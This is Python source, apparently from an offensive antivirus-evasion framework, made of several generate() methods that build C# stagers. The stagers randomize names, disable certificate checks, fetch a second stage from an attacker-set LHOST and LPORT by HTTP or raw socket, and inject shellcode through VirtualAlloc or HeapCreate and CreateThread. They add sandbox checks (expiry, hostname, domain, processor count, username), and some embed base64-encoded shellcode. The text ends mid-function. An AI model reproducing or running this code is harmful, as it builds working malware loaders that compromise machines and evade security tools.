def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (
evasion_helpers.randomString(), evasion_helpers.randomString())
# code for the randomString() function
randomStringName = evasion_helpers.randomString()
bufferName = evasion_helpers.randomString()
charsName = evasion_helpers.randomString()
t = list(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# logic to turn off certificate validation
validateServerCertficateName = evasion_helpers.randomString()
payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % (
validateServerCertficateName)
# code for the randomString() method
payload_code += "static string %s(Random r, int s) {\n" % (
randomStringName)
payload_code += "char[] %s = new char[s];\n" % (bufferName)
payload_code += "string %s = \"%s\";\n" % (charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" % (bufferName)
# code for the checksum8() function
checksum8Name = evasion_helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = evasion_helpers.randomString()
baseStringName = evasion_helpers.randomString()
randCharsName = evasion_helpers.randomString()
urlName = evasion_helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
genHTTPChecksumName, baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
baseStringName, randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
randCharsName, randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
randCharsName)
payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
checksum8Name, urlName, urlName)
# code for getData() function
getDataName = evasion_helpers.randomString()
strName = evasion_helpers.randomString()
webClientName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
strName)
payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % (
validateServerCertficateName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
webClientName)
payload_code += "byte[] %s = null;\n" % (sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" % (
sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = evasion_helpers.randomString()
sName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
# code for Main() to launch everything
sName = evasion_helpers.randomString()
randomName = evasion_helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
RandToday)
payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
RandExpire, RandToday,
self.required_options["EXPIRE_PAYLOAD"][0])
payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
RandExpire, RandToday)
# Add a tab for this check
curlyCount += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
self.required_options["HOSTNAME"][0].lower())
# Add a tab for this check
curlyCount += 1
if self.required_options["DOMAIN"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
# Add a tab for this check
curlyCount += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
self.required_options["PROCESSORS"][0])
# Add a tab for this check
curlyCount += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
rand_char_name = evasion_helpers.randomString()
payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
rand_user_name)
payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
rand_char_name, rand_user_name)
payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
rand_char_name, self.required_options["USERNAME"][0])
# Add a tab for this check
curlyCount += 1
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
randomName)
payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % (
sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
payload_code += "%s(%s);}\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(12)]
y = [evasion_helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
payload_code += "static string %s(Random r, int s) {\n" % (
randomStringName)
payload_code += "char[] %s = new char[s];\n" % (bufferName)
payload_code += "string %s = \"%s\";\n" % (charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" % (bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
genHTTPChecksumName, baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
baseStringName, randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
randCharsName, randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
randCharsName)
payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
checksum8Name, urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
strName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
webClientName)
payload_code += "byte[] %s = null;\n" % (sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" % (
sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
randomName)
payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
payload_code += "%s(%s);}\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
# randomize all our variable names, yo'
namespaceName = evasion_helpers.randomString()
className = evasion_helpers.randomString()
bytearrayName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
num_tabs_required = 0
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(12)]
y = [evasion_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (namespaceName,
className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
payload_code += "static void Main() {\n"
num_tabs_required += 2
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(
RandToday)
payload_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(
RandExpire, RandToday,
self.required_options["EXPIRE_PAYLOAD"][0])
payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(
RandExpire, RandToday)
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
self.required_options["HOSTNAME"][0].lower())
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
self.required_options["PROCESSORS"][0])
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
rand_char_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
rand_user_name)
payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(
rand_char_name, rand_user_name)
payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(
rand_char_name, self.required_options["USERNAME"][0])
# Add a tab for this check
num_tabs_required += 1
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode)
payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, bytearrayName)
payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
bytearrayName, funcAddrName, bytearrayName)
payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (
hThreadName, threadIdName, pinfoName)
payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (
hThreadName)
# payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heap = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_var = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (
bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
rand_ptr, rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
rand_ptr, bytearrayName, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(
rand_var)
payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, rand_ptr, rand_var)
payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(
hThreadName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Base64 Encode Shellcode
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
Shellcode = base64.b64encode(bytes(Shellcode,
'latin-1')).decode('ascii')
# randomize all our variable names, yo'
namespaceName = evasion_helpers.randomString()
className = evasion_helpers.randomString()
bytearrayName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
shellcodeName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
num_tabs_required = 0
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(12)]
y = [evasion_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (namespaceName,
className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
payload_code += "static void Main() {\n"
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % (
bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % (
bytearrayName)
payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % (
shellcodeName)
payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % (
shellcodeName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, shellcodeName)
payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
shellcodeName, funcAddrName, shellcodeName)
payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (
hThreadName, threadIdName, pinfoName)
payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (
hThreadName)
# payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heap = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_var = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
rand_ptr, rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
rand_ptr, bytearrayName, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(
rand_var)
payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, rand_ptr, rand_var)
payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(
hThreadName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
